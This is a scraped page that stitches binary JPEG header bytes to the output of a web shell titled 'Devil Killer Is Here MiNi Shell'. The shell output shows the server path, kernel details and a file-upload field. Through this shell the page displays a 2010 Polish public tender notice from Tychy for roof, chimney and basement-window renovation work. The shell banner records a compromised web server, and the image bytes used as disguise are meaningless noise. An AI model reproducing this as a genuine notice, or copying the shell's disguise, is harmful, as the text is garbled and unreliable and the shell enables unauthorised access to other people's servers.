JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/241721-N-2010.html

<p class="kh_header"><b>Tychy: WYMIANA POKRYCIA DACHOWEGO Z DACHÓWKI  CERAMICZNEJ  Z  REMONTEM  KOMINÓW  ORAZ WYMIANĄ OKIENEK PIWNICZNYCH W RAMACH ZADANIA INWESTYCYJNEGO PN.: TERMOMODERNIZACJA BUDYNKU  MIESZKALNEGO W TYCHACH, PRZY ULICY BIBLIOTECZNEJ 31-33</b><br>
<b>Numer ogłoszenia: 241721 - 2010; data zamieszczenia: 06.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednosta Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA POKRYCIA DACHOWEGO Z DACHÓWKI  CERAMICZNEJ  Z  REMONTEM  KOMINÓW  ORAZ WYMIANĄ OKIENEK PIWNICZNYCH W RAMACH ZADANIA INWESTYCYJNEGO PN.: TERMOMODERNIZACJA BUDYNKU  MIESZKALNEGO W TYCHACH, PRZY ULICY BIBLIOTECZNEJ 31-33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:    

 1.  Przedmiotem zamówienia są roboty budowlane, polegające na wykonaniu wymiany pokrycia 
      dachowego z dachówki ceramicznej wraz z remontem kominów oraz wymianą okienek 
      piwnicznych w budynku mieszkalnym- wielorodzinnym Wspólnoty Mieszkaniowej Nr 7/II 
      w Tychach , przy ul. Bibliotecznej 31-33.

      Zamówienie składa się z 2 części zwanych dalej zadaniami.

       Oznaczenie zadań:

         ZADANIE Nr 1  -  Wymiana pokrycia dachowego z dachówki ceramicznej z remontem kominów 

      ZADANIE Nr 2   -   Wymiana okienek piwnicznych

  2.  Zakres robót obejmuje m.in.:
1) DLA ZADANIA Nr 1:  WYMIANA POKRYCIA DACHOWEGO Z REMONTEM KOMINÓW: 

	     - prace przygotowawcze: wykonanie na dachu pomostów pochyłych , zamontowanie rynien 
           zsypowych, wykonanie zastaw zabezpieczających,
         - roboty rozbiórkowe : rozebranie betonowych czap kominowych, rozebranie pokrycia 
            z dachówki ( połać trapezowa), rozebranie ław kominiarskich, 
         - wykonanie pokrycia dachu dachówką ceramiczną z przykręceniem wkrętami do łat, 
           impregnacja, przycięcie i przybicie kontrłat i łat , ułożenie na krokwiach ekranu 
           zabezpieczającego z folii paroprzepuszczalnej ( pow. dachu 508,37 m2),
         - wymiana ław kominiarskich z wykonaniem impregnacji grzybobójczej i ogniochronnej,
         - montaż barier śniegowych
         - przemurowanie kominów ,
         - wymiana czap kominowych,
         - sprawdzenie przewodów kominowych, 
         - wymiana obróbek blacharskich (pas podrynnowy, pas rynnowy, kominy, ogniomur), 
         - wymiana rynien dachowych, 
         - wykonanie wpustów( sztucery z blachy ocynkowanej),
         - uzupełnienie rur wentylacyjnych z kołpakiem z blachy ocynkowanej,
         - wywóz i utylizacja gruzu
         - wykonanie tynków na kominach ponad dachem,   
         - przygotowanie podłoża powierzchni bocznej kominów pod ocieplenie metodą lekką -mokrą, 
         - ocieplenie powierzchni bocznej kominów płytami styropianowymi,
         - malowanie farbą akrylową,
         - wykonanie izolacji przeciwwilgociowej

     2) DLA ZADANIA Nr 2:  WYMIANA OKIENEK PIWNICZNYCH

        - wymiana okienek piwnicznych - 25 sztuk,
        - ocieplenie ścian ( ościeża szer. 025 cm) płytami styropianowymi z przygotowaniem podłoża
          i wykonaniem wyprawy elewacyjnej cienkowarstwowej,
        - wymiana obróbek blacharskich,
        - wywóz i utylizacja gruzu,
3.  Szczegółowy zakres ww. robót określają przedmiary robót:
     Dla Zadania Nr 1: 
     1) Przedmiar robót: Wymiana pokrycia dachowego z remontem kominów:
                                   - prace przygotowawcze w lp. 1.1 ÷ 1.3
                                 -  wymiana pokrycia dachowego z remontem kominów w lp. 2.1 ÷ 2.26
     2)  Przedmiar robót: Tynki na kominach w lp. 3.1 ÷ 3.8  

     Dla Zadania Nr 2:  
     Przedmiar robót: Okna piwniczne w lp. 1 ÷ 8
     
  4.  Przedmiary robót jw. stanowią integralną część niniejszej specyfikacji.

  5.  Zamawiający dopuszcza zastosowanie materiałów innych (tzw. równoważnych) o parametrach         
       i właściwościach nie gorszych niż wskazane w przedmiarze robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust.1. pkt. 6) ustawy - Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.10-9, 45.26.12.11-6, 45.42.20.00-3, 45.32.00.00-6, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.26.13.20-3, 45.42.11.32-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla ZADANIA Nr 1 dot. Wymiany pokrycia dachowego z remontem kominów - oferta musi być zabezpieczona wadium w wysokości:  4 200,00 zł.
Dla ZADANIA Nr 2 dot. Wymiany okienek piwnicznych  -  wadium nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego posiadania wiedzy
     i doświadczenia  Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 5 lat 
     przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału 
     w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał 
     z należytą starannością:

      - DLA ZADANIA Nr 1  -  co najmniej 2 roboty budowlane - dekarskie (zrealizowane 
      w ramach odrębnych umów) w zakresie wykonania pokrycia dachów dachówką 
      ceramiczną, o wartości każdej z tych robót min. 76 000,00 zł (brutto).    
(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców).  


    - DLA ZADANIA Nr 2  -  co najmniej dwie roboty budowlane  (zrealizowane w ramach 
odrębnych umów) w zakresie w zakresie wymiany stolarki okiennej, o wartości każdej 
z tych robót min. 5 000, 00 zł (brutto).    
(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców).  
Ocena spełnienia tych warunków odbywać się będzie według zasady spełnia / nie spełnia
 		na podstawie złożonych oświadczeń i załączonych dokumentów wymaganych przez 
      	Zamawiającego zgodnie z ustawą Prawo zamówień publicznych określonych w Rozporządzeniu 
        Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U. Nr 226, poz. 1817) w sprawie 
        rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te 
        dokumenty mogą być składane.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału dotyczącego dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje osobą/ osobami zdolnymi do wykonania zamówienia, 
        a w szczególności co najmniej jedną osobą posiadającą uprawnienia budowlane 
        w specjalności konstrukcyjno - budowlanej (do kierowania robotami) , posiadającą 
        aktualne zaświadczenie z właściwej Izby Inżynierów Budownictwa potwierdzające członkostwo 
     i opłacenie składek -  dot.  Zadania Nr 1  i  Nr 2 
  

(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać    łącznie lub co najmniej jeden z Wykonawców).       
Ocena spełnienia tego warunku odbywać się będzie według zasady spełnia / nie spełnia
 		na podstawie złożonych oświadczeń i załączonych dokumentów wymaganych przez 
      	Zamawiającego zgodnie z ustawą Prawo zamówień publicznych określonych w Rozporządzeniu 
        Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U. Nr 226, poz. 1817) w sprawie 
        rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te 
        dokumenty mogą być składane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej    
       Zamawiający wymaga, aby Wykonawca wykazał, że jest ubezpieczony od odpowiedzialności 
       cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - o wartości 
       ubezpieczenia nie mniejszej niż:

       150 000,00 zł  - dla  Zadania Nr 1   
 	
          10 000,00 zł    -  dla zadania Nr 2    
(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców).  
Ocena spełnienia tego warunku odbywać się będzie według zasady spełnia / nie spełnia
 		na podstawie złożonych oświadczeń i załączonych dokumentów wymaganych przez 
      	Zamawiającego zgodnie z ustawą Prawo zamówień publicznych określonych w Rozporządzeniu 
        Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U. Nr 226, poz. 1817) w sprawie 
        rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te 
        dokumenty mogą być składane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy ( na  wybrane zadanie / zadania) sporządzony według wzoru stanowiącego załącznik Nr 1 do niniejszej specyfikacji), 2) Pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa, 3) Dowód wniesienia wadium  (dot. Zadania Nr 1), 4) Kosztorys ofertowy (na wybrane zadanie / zadania) do którego należy dołączyć zestawienie zbiorcze materiałów, 5) Protokół danych wyjściowych do kosztorysowania - wg wzoru druku protokołu danych wyjściowych do kosztorysowania, który  stanowi załącznik Nr 7  do niniejszej specyfikacji ( dla Zadania Nr 1 i 2).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku 
do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
      1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości 
           stawki VAT (dot. Zadania  Nr 1 i Nr 2 );
      2)  wydłużenia terminu zakończenia robót wyłącznie w sytuacji udokumentowanego  
           wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających wykonywanie 
           prac termomodernizacyjnych zgodnie z technologią i sztuką budowlaną, pod warunkiem 
           terminowego - zgodnego z umową terminu rozpoczęcia robót  (dot. Zadania Nr 1 );  
    3)  wydłużenia terminu zakończenia robót w przypadku wystąpienia robót dodatkowych 
         nie objętych zamówieniem podstawowym, których wykonanie stało się konieczne na skutek
         sytuacji niemożliwej wcześniej do przewidzenia (dot. Zadania  Nr 1 i Nr 2 ), jeżeli:
             a)	  z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego 
     od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów    
              lub
      b)  wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia
  		     dodatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - pokój Nr 20 - cena 15,00 zł (brutto) lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15, 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1  -  Wymiana pokrycia dachowego z dachówki ceramicznej z remontem kominów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in. DLA ZADANIA Nr 1:  WYMIANA POKRYCIA DACHOWEGO Z REMONTEM KOMINÓW: 
- prace przygotowawcze: wykonanie na dachu pomostów pochyłych , zamontowanie rynien 
           zsypowych, wykonanie zastaw zabezpieczających,
         - roboty rozbiórkowe : rozebranie betonowych czap kominowych, rozebranie pokrycia 
            z dachówki ( połać trapezowa), rozebranie ław kominiarskich, 
         - wykonanie pokrycia dachu dachówką ceramiczną z przykręceniem wkrętami do łat, 
           impregnacja, przycięcie i przybicie kontrłat i łat , ułożenie na krokwiach ekranu 
           zabezpieczającego z folii paroprzepuszczalnej ( pow. dachu 508,37 m2),
         - wymiana ław kominiarskich z wykonaniem impregnacji grzybobójczej i ogniochronnej,
         - montaż barier śniegowych
         - przemurowanie kominów ,
         - wymiana czap kominowych,
         - sprawdzenie przewodów kominowych, 
         - wymiana obróbek blacharskich (pas podrynnowy, pas rynnowy, kominy, ogniomur), 
         - wymiana rynien dachowych, 
         - wykonanie wpustów( sztucery z blachy ocynkowanej),
         - uzupełnienie rur wentylacyjnych z kołpakiem z blachy ocynkowanej,
         - wywóz i utylizacja gruzu
         - wykonanie tynków na kominach ponad dachem,   
         - przygotowanie podłoża powierzchni bocznej kominów pod ocieplenie metodą lekką -mokrą, 
         - ocieplenie powierzchni bocznej kominów płytami styropianowymi,
         - malowanie farbą akrylową,
         - wykonanie izolacji przeciwwilgociowej
Szczegółowy zakres ww. robót określają przedmiary robót:
     Dla Zadania Nr 1: 
     1) Przedmiar robót: Wymiana pokrycia dachowego z remontem kominów:
                                   - prace przygotowawcze w lp. 1.1 ÷ 1.3
                                 -  wymiana pokrycia dachowego z remontem kominów w lp. 2.1 ÷ 2.26
     2)  Przedmiar robót: Tynki na kominach w lp. 3.1 ÷ 3.8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.10-9, 45.26.12.11-6, 45.42.20.00-3, 45.32.00.00-6, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.26.13.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2   -   Wymiana okienek piwnicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in. DLA ZADANIA Nr 2:  WYMIANA OKIENEK PIWNICZNYCH
- wymiana okienek piwnicznych - 25 sztuk,
        - ocieplenie ścian ( ościeża szer. 025 cm) płytami styropianowymi z przygotowaniem podłoża
Szczegółowy zakres ww. robót określa przedmiar robót:
Dla Zadania Nr 2:  
     Przedmiar robót: Okna piwniczne w lp. 1 ÷ 8

          i wykonaniem wyprawy elewacyjnej cienkowarstwowej,
        - wymiana obróbek blacharskich,
        - wywóz i utylizacja gruzu,.</p></li>
